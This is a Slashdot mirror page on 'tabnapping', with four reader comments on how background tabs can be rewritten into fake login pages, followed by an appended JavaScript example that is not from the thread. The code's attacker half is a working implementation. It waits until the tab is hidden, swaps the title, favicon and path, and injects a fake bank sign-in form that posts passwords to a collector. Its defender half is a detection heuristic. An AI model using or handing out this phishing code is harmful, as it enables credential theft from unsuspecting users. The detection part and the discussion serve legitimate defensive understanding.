Slashdot Mirror


Tabnapping Scams Around the Corner?

scamdetect pointed us to an interesting bit of news about a new security risk called tabnapping that was recently outlined by Aza Raskin. The short story is that background tabs are updated with login forms impersonating the sites they originally contained, but hosted by helpful third parties primarily interested in your password. (CT: Original writeup removed at request of submitter)

4 of 362 comments

  1. Sneaky... by fuzzyfuzzyfungus · Score: 3, Interesting

    Obviously, this won't subvert SSL certs or anything; but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.

    And, since pages reloading themselves, or even forwarding to a different domain and URL entirely, after a delay is fairly common (if generally annoying) in a wide variety of legitimate applications, you can't really just break the ability to do that. Sure, you could add it as an advanced option somewhere, or get it largely for free with the right NoScript settings; but there is no way you can break it by default.

    You pretty much just fall back on the phishing filter, which is a lame, AV-esque "solution". This would seem to apply to all tabbed browsers, as well.

  2. disabling scripts on unfocused tabs? by roman_mir · Score: 4, Interesting

    Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.

    But this can be done in separate windows too, not just in tabs. In terms of whether this is a new concept, let's just say that I have 'seen' this done 10 years ago to gain access to some chat accounts.

  3. Re:Umm... by fuzzyfuzzyfungus · Score: 3, Interesting

    P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."

    Arguably, that will be the case here. Your basic clueless noobtard will click on just about anything that looks vaguely plausible, and a lot of stuff that doesn't. This technique will be overkill for them, since straight phishing still works just fine.

    Your competent power user, on the other hand, may not fall for the trivial cases (two or three tabs, "innocuous-linkfarm.typosquatter.com" changes into "evil.ath.cx/yourbankherereallyhonestly.html" in front of your eyes); but they are the ones most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be a totally understandable mistake, some percentage of the time, especially if you were tired, distracted, multitasking, or getting sauced enough to face a legacy refactoring project.

    Again, tab-related trickery is of no particular use against SSL and cert validation, so the clueful user could detect it that way (unless combined with some attack on SSL, the browser's implementation of it, or the integrity of a trusted certificate authority); but there is no particular reason to suspect that any but the most paranoid user would detect the tab-substitution attack itself.

  4. Re:Not exactly. by WrongSizeGlass · Score: 4, Interesting

    So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.

    Exactly ... but if the 'fake' site checks your browser history for the specific fake login screens they have in their repertoire then they can show one that you have used recently.
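The mechanic the summary and comment 4 describe (wait until the user has left the tab, then rewrite the tab's own title, favicon and body) and the kind of check comment 2 is reaching for, as an added example. This is not Aza Raskin's demo code and not anything a commenter posted. The attacker's timing logic and the defender's before/after comparison are written as plain functions so they can run under Node; the `document` wiring at the bottom only runs in a browser. The target brand, favicon path, `/yourbank/login` path and `/collect` URL are hypothetical placeholders, and the registrable-domain helper is a deliberately crude approximation (last two labels, no public-suffix list).

```javascript
// Added example for this thread, not Aza Raskin's original demo and not a commenter's code.
// Pure logic first (runs under Node); browser wiring at the bottom (runs only if `document` exists).

// ---------- Attacker side: "wait until you are away from HIS tab" ----------

// Tracks tab visibility and decides when the page may rewrite itself.
class TabnabController {
  constructor({ delayMs = 5000, now = () => Date.now() } = {}) {
    this.delayMs = delayMs;   // how long the tab must stay in the background
    this.now = now;           // injectable clock so the logic can be tested
    this.hiddenSince = null;  // when the tab went into the background, or null if visible
    this.swapped = false;     // swap at most once
  }
  // Call with document.hidden on every visibilitychange (blur/focus work the same way).
  onVisibilityChange(hidden) {
    if (hidden) {
      if (this.hiddenSince === null) this.hiddenSince = this.now();
    } else {
      this.hiddenSince = null;  // user came back too early: stay innocuous, restart later
    }
  }
  // True once the tab has been hidden continuously for delayMs and no swap has happened yet.
  shouldSwap() {
    if (this.swapped || this.hiddenSince === null) return false;
    return this.now() - this.hiddenSince >= this.delayMs;
  }
  markSwapped() { this.swapped = true; }
}

// The replacement identity: title, favicon, a same-origin path (the origin itself cannot change)
// and a login form posting to the attacker's collector. `target` and `collectorUrl` are hypothetical.
function fakeLoginPage(target, collectorUrl) {
  return {
    title: `${target.name} - Sign in`,
    favicon: target.favicon,
    path: target.path,
    html:
      `<h1>Sign in to ${target.name}</h1>` +
      `<form method="post" action="${collectorUrl}">` +
      `<input name="user"><input name="pass" type="password">` +
      `<button>Sign in</button></form>`,
  };
}

// ---------- Defender side: snapshot the tab when it goes hidden, compare when it returns ----------

function snapshotOf(hostname, title, favicon) {
  return { hostname, title, favicon };
}

// Crude eTLD+1 (last two labels). Assumption: no public-suffix handling, so "x.co.uk" is wrong here.
function registrableDomain(hostname) {
  return hostname.toLowerCase().split('.').slice(-2).join('.');
}

// A real navigation changes the hostname; a tabnab keeps it and only changes the visible identity.
// Flag when title or icon changed in the background and no word of the new title names the
// tab's own registrable domain ("yourbank.scam.com" is judged by "scam.com", not by "yourbank").
function checkTabnab(before, after) {
  if (before.hostname !== after.hostname) {
    return { suspicious: false, reason: 'navigated to another origin' };
  }
  const changed = before.title !== after.title || before.favicon !== after.favicon;
  if (!changed) return { suspicious: false, reason: 'unchanged while hidden' };
  const site = registrableDomain(after.hostname);
  const tokens = after.title.toLowerCase().match(/[a-z]{3,}/g) || [];
  const namesOwnSite = tokens.some((tok) => site.includes(tok));
  return namesOwnSite
    ? { suspicious: false, reason: 'title changed but still names its own domain' }
    : { suspicious: true, reason: `title now reads "${after.title}" but the tab is still on ${after.hostname}` };
}

// ---------- Browser wiring for the attacker page (skipped under Node) ----------
if (typeof document !== 'undefined') {
  const ctl = new TabnabController({ delayMs: 5000 });
  const page = fakeLoginPage(
    { name: 'YourBank', favicon: '/yourbank.ico', path: '/yourbank/login' }, '/collect');
  document.addEventListener('visibilitychange', () => {
    ctl.onVisibilityChange(document.hidden);
    setTimeout(() => {
      if (!ctl.shouldSwap()) return;        // user came back before the delay elapsed
      document.title = page.title;
      let icon = document.querySelector('link[rel~="icon"]');
      if (!icon) { icon = document.createElement('link'); icon.rel = 'icon'; document.head.appendChild(icon); }
      icon.href = page.favicon;
      history.replaceState(null, '', page.path);  // path only; the address bar origin stays the attacker's
      document.body.innerHTML = page.html;
      ctl.markSwapped();
    }, ctl.delayMs);
  });
}
```

The defender half is only a heuristic, which is comment 1's point about phishing filters: legitimate pages change their titles in the background all the time (unread counts, chat notifications), so a check like this has to compare against something the attacker does not control (here, the registrable domain, which SSL and the address bar also pin) rather than against what the page says about itself.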